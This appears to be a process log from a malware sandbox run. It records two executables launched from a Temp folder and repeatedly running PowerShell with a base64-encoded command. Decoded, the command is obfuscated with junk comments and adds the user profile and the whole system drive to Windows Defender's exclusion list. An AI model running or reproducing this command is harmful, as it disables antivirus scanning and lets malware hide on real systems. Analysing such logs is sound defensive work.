"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-358902365948312753863198500276121551-160505813818928297931922359574-1072181426"
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
